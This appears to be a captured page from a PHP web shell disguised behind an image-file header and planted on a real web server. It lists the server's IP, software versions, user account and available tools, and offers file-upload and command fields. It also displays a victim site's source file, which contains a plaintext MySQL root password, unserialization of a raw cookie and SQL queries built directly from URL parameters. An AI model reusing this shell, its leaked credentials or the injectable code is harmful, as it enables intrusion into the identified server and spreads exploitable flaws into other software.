????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.147.44.46
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.supervision-online.se/onthefly/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.supervision-online.se/onthefly/setStatus.php
<?PHP
session_start();

if($_SESSION['SUPERVISION_SSO_INFO'] == "" || $_SESSION['SUPERVISION_SSO_INFO'][0] == 0){
	$_SESSION['SUPERVISION_SSO_INFO']  = unserialize($_COOKIE["SUPERVISION_SSO_INFO"]);
}


$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("supervision");

$lat = $_GET['lat'];
$long = $_GET['long'];
$status = $_GET['status'];
$fel = $_GET['fel'];
$SymbolSetId = $_GET['symbolSetId'];


	$sql = "SELECT * FROM tblSymbolSets WHERE symbolSetId = $SymbolSetId";
	
	$result = mysql_query($sql);
	  
	while ($row = mysql_fetch_assoc($result)){ 
		$name = $row['name'];
		
	}

$userid = $_SESSION['SUPERVISION_SSO_INFO'][0];
$companyid = $_SESSION['SUPERVISION_SSO_INFO'][1];



$d = gmdate("Y-m-d H:i:s");
//$d = strtotime("-1 hour", $d);

$sql = "INSERT INTO tblPositions VALUES (NULL ,  '0',  '0',  'OnTheFly - ".$name."',  '$lat',  '$long',  '',  '$fel',  '',  '',  '',  '$status',  '$SymbolSetId',  '$d',  '$userid')";

$result = mysql_query($sql);

$sql = "UPDATE * tblUsers set userlat = '$lat' and userlong = '$long' where userId = '$userid'";

$result = mysql_query($sql);


header("Location: addPoint.php?symbolSetId=".$SymbolSetId."&lat=".$lat."&long=".$long);

?>

Youez - 2016 - github.com/yon3zu
LinuXploit